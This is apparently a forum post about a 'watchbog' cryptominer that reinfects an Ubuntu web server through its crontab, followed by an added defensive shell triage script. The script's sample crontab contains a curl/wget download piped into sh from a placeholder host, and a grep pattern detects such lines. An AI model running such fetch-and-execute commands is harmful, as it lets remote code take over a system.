Hello!


There is a new virus out there which creates a process called "WATCHBOG" and eats all the CPU on the server. After further investigation, I found out that this virus is mining cryptocurrency.

Full story:

Server specs:
OS: Ubuntu server 16.04.5 LTS
Software: Apache2 with virtual hosts, MySQL, PHP 5.6, PHP 7

When I found out that this web server was infected, the web pages still worked, but awfully slowly.
So the first thing I saw was the watchbog process eating all the CPU, so I tried to kill it, but it reappears instantly, and everything is so slow that it is almost impossible to operate the server.
Next I thought, "OK, I need to terminate this process", so I decided to put "* * * * * killall watchbog" in crontab. I opened crontab
and found out that it was compromised as well, so I removed this new entry from crontab and deleted the watchbog file, and after a minute or two everything magically reappeared.
Crontab was compromised again to run some kind of remote script, and the watchbog process was up and eating CPU again.

I tried to find anything useful on the web, and found these articles:

Here is the most helpful one:
https://sudhakarbellamkonda.blogspot...50061219193777

After following this article, the watchbog virus still reappeared,
so I came up with this solution:
open a screen session as root and then run this loop: ( while true ; do killall watchbog ; done )
and leave it running in the background by detaching the screen session with CTRL+A, D.
I posted this solution in that blog as well.
And here is one other post, but nothing there is really helpful:
https://unix.stackexchange.com/quest...i-cant-get-rid

So I tried fighting this virus in many ways, changed passwords, reinstalled SSH, etc., and no luck.
Meanwhile, I created a new Ubuntu server with the latest 18.04.1 LTS.
We installed all the latest web server stuff, enabled UFW, and opened the web and FTP ports.
Then I migrated the WWW data and SQL, changed the IP back to the original server's IP, and..... there it is AGAIN.
The virus came back on the new machine,
so I think this virus probably infects the system by using some vulnerability in the web server software, but really, I don't know, and I can't find out, and I'm not the only one trying.

Please HELP !

P.S.
This is my first post, so judge me softly, please.
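Added example (not part of the original post, and not the poster's own commands): a small POSIX shell triage helper for the cron-based reinfection described above. It assumes only what the post states, a process named watchbog and a crontab that keeps being rewritten to run a remote script. The sample crontab text and the example.invalid URL are constructed for illustration; the real download host is not known from the post, so the scan looks for generic download-and-execute patterns and for the process name rather than a specific address.

```shell
#!/bin/sh
# Triage helper for a cron-based reinfection where a miner process
# ("watchbog", as named in the post) reappears after the crontab is
# rewritten. Added example; the post's own fix was a killall loop.

# Constructed sample crontab text, standing in for `crontab -l` output.
# The example.invalid URL is a placeholder; the real host is unknown.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * (curl -fsSL http://example.invalid/x.sh||wget -qO- http://example.invalid/x.sh)|sh
* * * * * killall watchbog'

# Print non-comment cron lines that fetch something over the network and
# pipe it into a shell, or that reference the miner's process name.
scan_cron_text() {
    printf '%s\n' "$1" | grep -vE '^[[:space:]]*(#|$)' | \
        grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|watchbog' || true
}

# Number of suspicious lines found by scan_cron_text (0 if none).
count_suspicious() {
    scan_cron_text "$1" | grep -c . || true
}

# Every place cron and systemd can run scheduled jobs on an Ubuntu host.
# Reads the live system; run as root. Persistence is often in a user's
# crontab or /etc/cron.d rather than root's crontab alone.
dump_all_schedules() {
    for u in $(cut -d: -f1 /etc/passwd); do
        crontab -l -u "$u" 2>/dev/null | sed "s/^/[$u] /" || true
    done
    cat /etc/crontab /etc/cron.d/* 2>/dev/null || true
    systemctl list-timers --all --no-pager 2>/dev/null || true
}

# Show each running miner with its parent and binary path, so the
# process that respawns it can be identified instead of only killing
# the child over and over.
show_miner_tree() {
    for pid in $(pgrep -x watchbog); do
        ppid=$(awk '/^PPid:/{print $2}' "/proc/$pid/status")
        exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo '(deleted or unreadable)')
        parent=$(ps -o comm= -p "$ppid" 2>/dev/null || echo '?')
        printf 'pid=%s ppid=%s parent=%s exe=%s\n' "$pid" "$ppid" "$parent" "$exe"
    done
}

# `sh triage.sh live` inspects the real host; with no argument it only
# runs the scan over the constructed sample so it can be tried offline.
if [ "${1:-}" = "live" ]; then
    dump_all_schedules
    show_miner_tree
else
    scan_cron_text "$SAMPLE_CRONTAB"
fi
```

On the sample text the scan flags the curl/wget-pipe-to-sh line and the killall line (two hits) and leaves the certbot job alone. On a live host, run it as root: the interesting output is the parent shown by show_miner_tree and any crontab owner other than root in dump_all_schedules, since those point at the component that keeps rewriting the schedule.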